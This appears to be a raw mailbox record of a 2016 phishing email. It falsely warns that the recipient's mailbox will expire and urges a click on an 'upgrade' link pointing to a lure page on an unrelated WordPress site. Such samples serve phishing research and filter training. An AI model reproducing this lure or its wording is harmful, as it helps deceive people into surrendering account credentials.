From: "Account"<yadhi_aristianto@luckytex.com>
Date: Mon, 01 Feb 2016 16:47:18 -0800
Message-Id: <20160202004743.08C9162ED5F@zombrie.luckytex.com>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 45

You will not see this in a MIME-aware mail reader.
--===============0118382495==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


    Re-Validate Your Mailbox!!!
Your Account Will Be Blocked! 	 =

   Your Account will Expire 15 ,FEB, 2016 If you would like to continue usi=
ng your Email Address, 	 =

    =

    Click Here To Upgrade Your Account Now !!! 	 =

    	 =

   YOU WILL LOSE YOUR EMAIL ADDRESS IF YOU DO NOT UPGRADE YOUR ACCOUNT. UPG=
RADE IS FREE =

 	 =

   Thanks. 	 =

   Mail Team!-2016 All Rights Reserved 	 =

   =20

                                                                                                                                    =0A=0A=0ALucky Textile Group=0A----------------------------------------------------------------------=0AAvant d'imprimer ce mail, pensez  l'environnement=0ABefore printing, think about the environment=0A----------------------------------------------------------------------=0AThis e-mail, any attachments and the information contained therein ('this message') are confidential and intended solely for the use of the addressee(s). If you have received this message in error please send it back to the sender and delete it. Unauthorized publication, use, dissemination or disclosure of this message, either in whole or in part is strictly prohibited.=0A**********************************************************************=0ACe message electronique et tous les fichiers joints ainsi que les informations contenues dans ce message (ci apres 'le message'), sont confide
 ntiels et destines exclusivement a l'usage de la personne a laquelle ils sont adresses. Si vous avez recu ce message par erreur, merci de le renvoyer a son emetteur et de le detruire. Toute diffusion, publication, totale ou partielle ou divulgation sous quelque forme que ce soit non expressement autorisees de ce message, sont interdites.=0A

--===============0118382495==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><table dir=3D"ltr" style=3D"color: #222222; font-fam=
ily: arial, sans-serif; font-size: 13px; font-style: normal; font-variant: =
normal; font-weight: normal; letter-spacing: normal; line-height: normal; o=
rphans: auto; text-align: start; text-indent: 0px; text-transform: none; wh=
ite-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-wid=
th: 0px; background-color: #ffffff;" align=3D"center">
<tbody>
<tr>
<td style=3D"font-family: arial, sans-serif; margin: 0px; border-spacing: 2=
px; padding: 0px; color: #2672ec; font-size: 41px;">
<div style=3D"margin: 0px; padding: 0px;" align=3D"center"><span style=3D"c=
olor: #0080ff;">Re-Validate Your Mailbox!!!</span><span style=3D"color: #00=
80ff;"><br />Your Account Will Be Blocked!</span></div>
</td>
</tr>
<tr>
<td style=3D"font-family: arial, sans-serif; margin: 0px; border-spacing: 2=
px; padding: 25px 0px 0px; color: #2a2a2a; font-size: 14px;">
<div style=3D"margin: 0px; padding: 0px;" align=3D"center"><span style=3D"c=
olor: #80ff00;"><span style=3D"color: #454545; font-family: Corbel; font-si=
ze: 12pt;"><span style=3D"color: #000000;">Y</span><span style=3D"color: #0=
00000;">our Account will </span><span style=3D"color: #ff0000;"><strong>Exp=
ire</strong>&nbsp;<strong><span style=3D"font-family: 'Microsoft Sans Serif=
';">15</span> ,</strong></span></span></span><strong style=3D"color: #ff000=
0; font-family: Corbel; font-size: 16px;"><span style=3D"font-family: 'Micr=
osoft Sans Serif';">FEB, </span></strong><span style=3D"color: #80ff00;"><s=
pan style=3D"color: #454545; font-family: Corbel; font-size: 12pt;"><span s=
tyle=3D"color: #ff0000;"><strong><span style=3D"font-family: 'Microsoft San=
s Serif';">2016</span></strong></span></span></span></div>
<div style=3D"margin: 0px; padding: 0px;" align=3D"center"><span style=3D"c=
olor: #454545; font-family: Corbel; font-size: 12pt;"><span style=3D"font-s=
ize: 12pt;"><span style=3D"color: #000000;">If you would like to continue u=
sing your Email Address,</span></span></span></div>
</td>
</tr>
<tr>
<td style=3D"font-family: arial, sans-serif; margin: 0px; border-spacing: 2=
px; padding: 25px 0px 0px; color: #2a2a2a; font-size: 14px;">
<div align=3D"center">
<table style=3D"padding: 0px;" border=3D"0" cellspacing=3D"0" align=3D"cent=
er">
<tbody style=3D"width: 204px;">
<tr>
<td style=3D"font-family: arial, sans-serif; margin: 0px; border-spacing: 2=
px; padding: 5px 20px; min-width: 50px; background-color: #2672ec;" bgcolor=
=3D"#2672ec">
<div style=3D"margin: 0px; padding: 0px;" align=3D"center"><a style=3D"colo=
r: #ffffff; margin: 0px; padding: 0px; outline: none medium; letter-spacing=
: 0.02em; background-color: transparent;" href=3D"http://www.forexdn.com/wp=
-includes/css/docx.htm" target=3D"_blank">Click Here To Upgrade Your Accoun=
t Now !!!</a></div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
<tr>
<td style=3D"font-family: arial, sans-serif; margin: 0px; border-spacing: 2=
px; padding: 25px 0px 0px; color: #2a2a2a; font-size: 14px;">
<div style=3D"text-align: center; margin-top: 0pt; margin-bottom: 0pt;"><sp=
an style=3D"color: #454545; font-family: Corbel; font-size: 12pt;">YOU WILL=
 LOSE YOUR EMAIL ADDRESS IF YOU DO NOT UPGRADE YOUR ACCOUNT.</span></div>
<div style=3D"text-align: center; margin-top: 0pt; margin-bottom: 0pt;"><sp=
an style=3D"color: #454545; font-family: Corbel; font-size: 12pt;"><span st=
yle=3D"color: #000000;">UPGRADE IS FREE <br /></span></span></div>
</td>
</tr>
<tr>
<td style=3D"font-family: arial, sans-serif; margin: 0px; border-spacing: 2=
px; padding: 25px 0px 0px; color: #2a2a2a; font-size: 14px;">
<div style=3D"margin: 0px; padding: 0px;" align=3D"center">Thanks.</div>
</td>
</tr>
<tr>
<td style=3D"font-family: arial, sans-serif; margin: 0px; border-spacing: 2=
px; padding: 0px;">
<div style=3D"margin: 0px; padding: 0px;" align=3D"center"><span style=3D"c=
olor: #454545; font-family: Candara; font-size: medium;">Mail Team</span><s=
pan style=3D"color: #454545; font-family: Candara; font-size: medium;">!</s=
pan><span style=3D"color: #454545; font-family: Corbel; font-size: 12pt;">&=
copy;2016</span><span style=3D"color: #454545; font-family: Candara; font-s=
ize: 12pt;"> All Rights Reserved</span></div>
</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<br>=
<html><body><br><br>=0A<FONT FACE=3D'arial'><font size=3D'5'>=0A<b>Lucky Textile Group</b>=0A</font></FONT>=0A<font size=3D'2'>=0A<br>-----------------------------------------------------------------------------------------<br>=0A</font>=0A<FONT FACE=3D'arial'><font size=3D'3'>=0A<b>Avant d'imprimer ce mail, pensez  l'environnement</b>=0A<br>=0A<b><i>Before printing, think about the environment</i></b>=0A</font></FONT>=0A<font size=3D'2'>=0A<br>-----------------------------------------------------------------------------------------<br>=0A</font>=0A<FONT FACE=3D'arial'><font size=3D'2'><p align=3D'justify'>=0AThis e-mail, any attachments and the information contained therein (&quot;this message&quot;) are confidential and intended solely for the use of the addressee(s). If you have received this message in error please send it back to the sender and delete it. Unauthorized publication, use, dissemination or disclosure of this message, either in whole or in part is strictly prohibited
 .=0A<br>=0A*****************************************************************************************=0A<br>=0ACe message electronique et tous les fichiers joints ainsi que les informations contenues dans ce message (ci apres &quot;le message&quot;), sont confidentiels et destines exclusivement a l'usage de la personne a laquelle ils sont adresses. Si vous avez recu ce message par erreur, merci de le renvoyer a son emetteur et de le detruire. Toute diffusion, publication, totale ou partielle ou divulgation sous quelque forme que ce soit non expressement autorisees de ce message, sont interdites.=0A</p></font></FONT>=0A</body></html>=0A=0A
<br>=
</html>
--===============0118382495==--

From jose@monkey.org Tue Feb  2 22:07:25 2016 +0000
Return-Path: codewizard@approject.com
Delivered-To: jose@monkey.org
X-FDA: 71144897250.12.snail13_7ad95e9e84d16
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 50,0,0,f798d29753baf617,d41d8cd98f00b204,codewizard@approject.com,:,RULES_HIT:4:41:72:355:379:455:800:871:962:967:969:973:983:988:989:1000:1001:1189:1208:1256:1260:1263:1308:1309:1313:1314:1345:1381:1390:1394:1395:1431:1432:1433:1434:1437:1516:1517:1571:1573:1575:1589:1594:1685:1730:1744:1747:1777:1792:2194:2196:2198:2199:2200:2201:2393:2525:2527:2551:2553:2568:2610:2632:2638:2682:2685:2691:2693:2737:2741:2859:2890:2891:2892:2894:2895:2897:2901:2903:2905:2907:2917:2918:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3353:3552:3585:3586:3865:3867:3868:3870:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4700:6119:6238:6248:6261:6354:6506:6650:6669:6674:6678:6688:6747:7208:7281:7801:7809:7909:8509:8518:8568:8583:8603:8957:9025:9060:9074:9177:9416:9466:9908:10004:10049:10305:10346:11026:11473:11657:11658:11914:12043:12050:12438:12555:12679:12729:12737:12740:12776:12812:12963:12973:13038:13046:
X-HE-Tag: snail13_7ad95e9e84d16
X-Filterd-Recvd-Size: 19641
Received: from approject.com (unknown [138.122.105.2])
	by imf28.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  2 Feb 2016 22:07:23 +0000 (UTC)
